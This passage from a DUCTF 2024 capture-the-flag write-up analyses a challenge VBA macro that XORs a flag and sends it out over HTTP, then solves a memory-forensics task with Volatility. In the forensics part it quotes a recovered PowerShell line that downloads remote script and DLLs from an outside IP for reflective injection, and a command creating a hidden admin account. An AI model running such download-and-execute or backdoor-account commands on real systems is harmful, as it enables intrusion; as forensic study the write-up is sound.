As String\n    Dim D As String\n    Dim E As String\n    Dim F As String\n    Dim G As String\n    Dim H As String\n    Dim J As String\n    Dim K As String\n    Dim L As String\n    Dim M As String\n    Dim N As String\n    Dim O As String\n    Dim P As String\n    Dim Q As String\n    Dim R As String\n    Dim S As String\n    Dim T As String\n    Dim U As String\n    Dim V As String\n    Dim W As String\n    Dim X As String\n    Dim Y As String\n    Dim Z As String\n    Dim I As Long\n    N = importantThing()\n    K = &quot;Yes&quot;\n    S = &quot;Mon&quot;\n    U = forensics(K)\n    V = totalyFine(U)\n    D = &quot;Ma&quot;\n    J = &quot;https://play.duc.tf/&quot; + V\n    superThing (J)\n    J = &quot;http://flag.com/&quot;\n    superThing (J)\n    G = &quot;key&quot;\n    J = &quot;http://play.duc.tf/&quot;\n    superThing (J)\n    J = &quot;http://en.wikipedia.org/wiki/Emu_War&quot;\n    superThing (J)\n    N = importantThing()\n    Path = ThisWorkbook.Path &amp; &quot;\\flag.xlsx&quot;\n    Set wb = Workbooks.Open(Path)\n    Dim valueA1 As Variant\n    valueA1 = wb.Sheets(1).Range(&quot;A1&quot;).Value\n    MsgBox valueA1\n    wb.Close SaveChanges:=False\n    F = &quot;gic&quot;\n    N = importantThing()\n    Q = &quot;Flag: &quot; &amp; valueA1\n    H = &quot;Try Harder&quot;\n    U = forensics(H)\n    V = totalyFine(U)\n    J = &quot;http://downunderctf.com/&quot; + V\n    superThing (J)\n    W = S + G + D + F\n    O = doThing(Q, W)\n    M = anotherThing(O, W)\n    A = something(O)\n    Z = forensics(O)\n    N = importantThing()\n    P = &quot;Pterodactyl&quot;\n    U = forensics(P)\n    V = totalyFine(U)\n    J = &quot;http://play.duc.tf/&quot; + V\n    superThing (J)\n    T = totalyFine(Z)\n    MsgBox T\n    J = &quot;http://downunderctf.com/&quot; + T\n    superThing (J)\n    N = importantThing()\n    E = &quot;Forensics&quot;\n    U = forensics(E)\n    V = totalyFine(U)\n    J = &quot;http://play.duc.tf/&quot; + V\n    superThing (J)\n    \nEnd 
Sub\n\nPublic Function doThing(B As String, C As String) As String\n    Dim I As Long\n    Dim A As String\n    For I = 1 To Len(B)\n        A = A &amp; Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))\n    Next I\n    doThing = A\nEnd Function\n\nPublic Function superThing(ByVal A As String) As String\n    With CreateObject(&quot;MSXML2.ServerXMLHTTP.6.0&quot;)\n        .Open &quot;GET&quot;, A, False\n        .Send\n        superThing = StrConv(.responseBody, vbUnicode)\n    End With\nEnd Function\n\nPublic Function something(B As String) As String\n    Dim I As Long\n    Dim A As String\n    For I = 1 To Len(inputText)\n        A = A &amp; WorksheetFunction.Dec2Bin(Asc(Mid(B, I, 1)))\n    Next I\n    something = A\nEnd Function\n\nPublic Function forensics(B As String) As String\n    Dim A() As Byte\n    Dim I As Integer\n    Dim C As String\n    A = StrConv(B, vbFromUnicode)\n    For I = LBound(A) To UBound(A)\n        C = C &amp; CStr(A(I)) &amp; &quot; &quot;\n    Next I\n    C = Trim(C)\n    forensics = C\nEnd Function</code></pre></div>\n<p>It looks like <code class=\"language-text\">macro1</code> is executed first inside the macro file.</p>\n<p>Here, it seems to send GET requests to several URLs (the <code class=\"language-text\">superThing</code> function) and perform string manipulation.</p>\n<div class=\"gatsby-highlight\" data-language=\"visualbasic\"><pre class=\"language-visualbasic\"><code class=\"language-visualbasic\">N = importantThing()\nK = &quot;Yes&quot;\nS = &quot;Mon&quot;\nU = forensics(K)\nV = totalyFine(U)\nD = &quot;Ma&quot;\nJ = &quot;https://play.duc.tf/&quot; + V\nsuperThing (J)\nJ = &quot;http://flag.com/&quot;\nsuperThing (J)\nG = &quot;key&quot;\nJ = &quot;http://play.duc.tf/&quot;\nsuperThing (J)\nJ = &quot;http://en.wikipedia.org/wiki/Emu_War&quot;\nsuperThing (J)\nN = importantThing()\nPath = ThisWorkbook.Path &amp; &quot;\\flag.xlsx&quot;\nSet wb = Workbooks.Open(Path)\nDim valueA1 As Variant\nvalueA1 = 
wb.Sheets(1).Range(&quot;A1&quot;).Value\nMsgBox valueA1\nwb.Close SaveChanges:=False\nF = &quot;gic&quot;\nN = importantThing()\nQ = &quot;Flag: &quot; &amp; valueA1\nH = &quot;Try Harder&quot;\nU = forensics(H)\nV = totalyFine(U)\nJ = &quot;http://downunderctf.com/&quot; + V\nsuperThing (J)\nW = S + G + D + F\nO = doThing(Q, W)\nM = anotherThing(O, W)\nA = something(O)\nZ = forensics(O)\nN = importantThing()\nP = &quot;Pterodactyl&quot;\nU = forensics(P)\nV = totalyFine(U)\nJ = &quot;http://play.duc.tf/&quot; + V\nsuperThing (J)\nT = totalyFine(Z)\nMsgBox T\nJ = &quot;http://downunderctf.com/&quot; + T\nsuperThing (J)\nN = importantThing()\nE = &quot;Forensics&quot;\nU = forensics(E)\nV = totalyFine(U)\nJ = &quot;http://play.duc.tf/&quot; + V\nsuperThing (J)</code></pre></div>\n<p>If you inspect the HTTP requests, you can see that several requests include hyphen-separated byte sequences generated by the <code class=\"language-text\">forensics</code> and <code class=\"language-text\">totalyFine</code> functions.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 924px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/cee9c309bd479719717d2b0b82f787c4/9a1cf/image-20240711071929428.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.166666666666664%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4klEQVQY03WQy26DMBBF2SbQdZuQ/gLYYGxsoDxKG6VE/P/fnNpWpUpVuji69441Mxonp3PO8/mF0yUnf71wfEo5pEcO2TFqyP+S/WqaZp6UxDpL21tELVGmwQ0d2hoaj+0dVVMjVRUJ/hHSo41BNw2J8ea+bbwNA+u68rG+46zj63ZDKYWUEilkVFEKyrKM+pdYF4JEqZrtvrEsM9frJ8s8ofymfd+ZpolxnPzbEpd1XRebQvMjiqIgqaqKcRqxbUvf9zj/BaE2zzODz2FgGByytZZwkdaaxi81RmN+fKiFvm/sYZsCj9a1ywAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/cee9c309bd479719717d2b0b82f787c4/8ac56/image-20240711071929428.webp 240w,\n/static/cee9c309bd479719717d2b0b82f787c4/d3be9/image-20240711071929428.webp 480w,\n/static/cee9c309bd479719717d2b0b82f787c4/c3b05/image-20240711071929428.webp 924w\"\n              sizes=\"(max-width: 924px) 100vw, 924px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/cee9c309bd479719717d2b0b82f787c4/8ff5a/image-20240711071929428.png 240w,\n/static/cee9c309bd479719717d2b0b82f787c4/e85cb/image-20240711071929428.png 480w,\n/static/cee9c309bd479719717d2b0b82f787c4/9a1cf/image-20240711071929428.png 924w\"\n            sizes=\"(max-width: 924px) 100vw, 924px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/cee9c309bd479719717d2b0b82f787c4/9a1cf/image-20240711071929428.png\"\n            alt=\"image-20240711071929428\"\n            title=\"image-20240711071929428\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Most of them are meaningless strings like <code class=\"language-text\">Try Harder</code>, but one piece of data looks like it is actually being encrypted.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; 
display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c803ec60af8b4e7f4fdfa0a8854b421a/e7aec/image-20240711072224376.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 18.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAw0lEQVQY032M2W6DMBQF+f+vi0oaRJpUatPEMdgmBoxZDFNMVKl96cPozt1OIq3g4TWVUyt6dUNZS06XHGVKmqZdaXDO0bZP997Tdd02+6lxp5QiKdyNey242A9k+0XpBAeZk+kdui7w3fM5Mk3Tv8Sb5KhfyMoDe5lyMnveTUZephx1ijRiPfIMw8A4jluNT7+97/utt9YihCC511cevcIOms/qTFbseFuDz+aVqtWEKRDCxDzPGzFoWZbNY1AI4Y9/A8fxMbovEs6oAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c803ec60af8b4e7f4fdfa0a8854b421a/8ac56/image-20240711072224376.webp 240w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/d3be9/image-20240711072224376.webp 480w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/e46b2/image-20240711072224376.webp 960w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/f992d/image-20240711072224376.webp 1440w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/9ade6/image-20240711072224376.webp 1726w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c803ec60af8b4e7f4fdfa0a8854b421a/8ff5a/image-20240711072224376.png 240w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/e85cb/image-20240711072224376.png 480w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/d9199/image-20240711072224376.png 960w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/07a9c/image-20240711072224376.png 1440w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/e7aec/image-20240711072224376.png 1726w\"\n            sizes=\"(max-width: 960px) 100vw, 
960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c803ec60af8b4e7f4fdfa0a8854b421a/d9199/image-20240711072224376.png\"\n            alt=\"image-20240711072224376\"\n            title=\"image-20240711072224376\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><img src=\"/static/19924c6be572a5859fdee210bd3f69e4/a5a94/image-20240711072320426.png\" alt=\"image-20240711072320426\" /></p>\n<p>If you arrange the packets chronologically, this byte sequence appears in the second-to-last request.</p>\n<p><img src=\"/static/86ff8fa119e9a0a5d3c7cc71c8f2755f/bbdb4/image-20240711072421273.png\" alt=\"image-20240711072421273\" /></p>\n<p>This value is produced by the following code, and it is very likely the encrypted flag.</p>\n<p>Here, the flag obtained from the sheet is most likely being XORed with some key by the <code class=\"language-text\">doThing</code> function.</p>\n<div class=\"gatsby-highlight\" data-language=\"visualbasic\"><pre class=\"language-visualbasic\"><code class=\"language-visualbasic\">Q = &quot;Flag: &quot; &amp; valueA1\n***\nW = S + G + D + F\nO = doThing(Q, W)\n***\nZ = forensics(O)\n***\nT = totalyFine(Z)\nMsgBox T\nJ = &quot;http://downunderctf.com/&quot; + T\nsuperThing (J)</code></pre></div>\n<p>Also, the XOR key used here, <code class=\"language-text\">S + G + D + F</code>, is written in plaintext without any trick, so I was able to get the flag directly.</p>\n<p><img src=\"/static/862072f3713f5cfe095b879752c49788/e72de/image-20240711204449070.png\" alt=\"image-20240711204449070\" /></p>\n<h2 id=\"lost-in-memoryforensic\" style=\"position:relative;\">Lost in Memory(Forensic)</h2>\n<blockquote>\n<p>Looks like one of our Emu soldiers ran something on an Outpost machine and now it’s doing strange things. We took a memory dump as a precaution. Can you tell us what’s going on?</p>\n<p>This challenge has four parts to combine into the final flag with <code class=\"language-text\">_</code> between each answer. Find all four answers and combine them into the flag as all lower case like <code class=\"language-text\">DUCTF{answer1_answer2_answer3_answer4}</code> eg. <code class=\"language-text\">DUCTF{malicious.xlsm_invoke-mimikatz_malware.exe-malware2.exe_strong-password123}</code></p>\n<ol>\n<li>What was the name of the malicious executable? eg <code class=\"language-text\">malicious.xlsm</code></li>\n<li>What was the name of the powershell module used? eg <code class=\"language-text\">invoke-mimikatz</code></li>\n<li>What were the names of the two files executed from the malicious executable (In alphabetical order with - in between and no spaces)? eg <code class=\"language-text\">malware.exe-malware2.exe</code></li>\n<li>What was the password of the new account created through powershell? eg <code class=\"language-text\">strong-password123</code></li>\n</ol>\n</blockquote>\n<p>The challenge provides a memory dump as the artifact.</p>\n<p><img src=\"/static/a61f1acca77ddb39900acffc58e41ce5/6aacb/image-20240711211954638.png\" alt=\"image-20240711211954638\" /></p>\n<p>Analyzing this dump and finding the four answers yields the flag.</p>\n<h3 id=\"task-1\" style=\"position:relative;\">Task 1</h3>\n<p>First, I needed to find the suspicious executable.</p>\n<p>To start, I scanned the processes with <code class=\"language-text\">vol3 -f ./EMU-OUTPOST.raw windows.psscan</code>.</p>\n<p>The process scan did not reveal anything suspicious, but when I checked the command lines with <code class=\"language-text\">vol3 -f ./EMU-OUTPOST.raw windows.cmdline.CmdLine</code>, I found suspicious files such as <code class=\"language-text\">C:\\Users\\emu\\Desktop\\Monke\\Monke.xlsm</code> and <code class=\"language-text\">C:\\Users\\emu\\Downloads\\monkey.doc.ps1</code>.</p>\n<p><img src=\"/static/bc780c016a93be7ca39f69e2d88b3dfc/89048/image-20240711212240659.png\" alt=\"image-20240711212240659\" /></p>\n<h3 id=\"task-2\" style=\"position:relative;\">Task 2</h3>\n<p>Next, I needed to identify the suspicious PowerShell module that had been loaded.</p>\n<p>To start, I dumped the PowerShell processes.</p>\n<p>There were the following three PowerShell processes.</p>\n<p><img src=\"/static/4e09287acf49c9faefe9913c1860d766/20c85/image-20240711220253029.png\" alt=\"image-20240711220253029\" /></p>\n<p>I dumped the processes with the following commands.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">vol3 -o /tmp -f ./EMU-OUTPOST.raw windows.memmap --dump --pid <span class=\"token number\">1136</span>\nvol3 -o /tmp -f ./EMU-OUTPOST.raw windows.memmap --dump --pid <span class=\"token number\">3268</span>\nvol3 -o /tmp -f ./EMU-OUTPOST.raw windows.memmap --dump --pid <span class=\"token number\">2520</span></code></pre></div>\n<p>When I analyzed the dump of PID 1136 among these, I confirmed that the following code was being executed: <code class=\"language-text\">Start-Job -ScriptBlock {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/emu.dll};Start-Job -ScriptBlock {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/kiwi.dll}</code>.</p>\n<p><img src=\"/static/0247912650003b9b4d6126f3b05fbd65/9b1e2/image-20240711220602875.png\" alt=\"image-20240711220602875\" /></p>\n<h3 id=\"task-3\" style=\"position:relative;\">Task 3</h3>\n<p>Next, I had to identify the two files called from the malicious executable.</p>\n<p>To be honest, this part required some guessing, but <code class=\"language-text\">emu.dll</code>, <code class=\"language-text\">monkey.dll</code>, and <code class=\"language-text\">kiwi.dll</code>, which appeared in the grep results above, looked like candidate answers.</p>\n<h3 id=\"task-4\" style=\"position:relative;\">Task 4</h3>\n<p>Finally, I needed to identify the password of the account that had been created.</p>\n<p>I was completely stuck here, but after reading the writeup, it seems that searching the PowerShell process dump for places where further PowerShell commands were being issued yields the obfuscated code.</p>\n<p><img src=\"/static/665cf653902e853a253e48593eee6464/7e11a/image-20240712000616138.png\" alt=\"image-20240712000616138\" /></p>\n<p>Decoding this in CyberChef shows that it executes <code class=\"language-text\">net user admin 5up3r-5ecur3 /add</code>.</p>\n<p><img src=\"/static/009b5c41c897432f60eff3d580e5faf3/06868/image-20240712001107359.png\" alt=\"image-20240712001107359\" /></p>\n<p>The final correct flag was <code class=\"language-text\">DUCTF{monkey.doc.ps1_invoke-reflectivepeinjection_emu.dll-kiwi.dll_5up3r-5ecur3}</code>.</p>\n<h2 id=\"summary\" style=\"position:relative;\">Summary</h2>\n<p>I spent too much time on easy problems, so I want to get better at solving them quickly as well.</p>","fields":{"slug":"/ctf-ductf-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2024-07-12","description":"DUCTF 2024 Writeup","tags":["Rev (en)","Pwn (en)","Forensic (en)","English"],"title":"DUCTF 2024 Writeup","socialImage":{"publicURL":"/static/c079c6637f6618a3beb6fab238cf69cc/ctf-ductf-2024.png"}}}},"pageContext":{"slug":"/ctf-ductf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}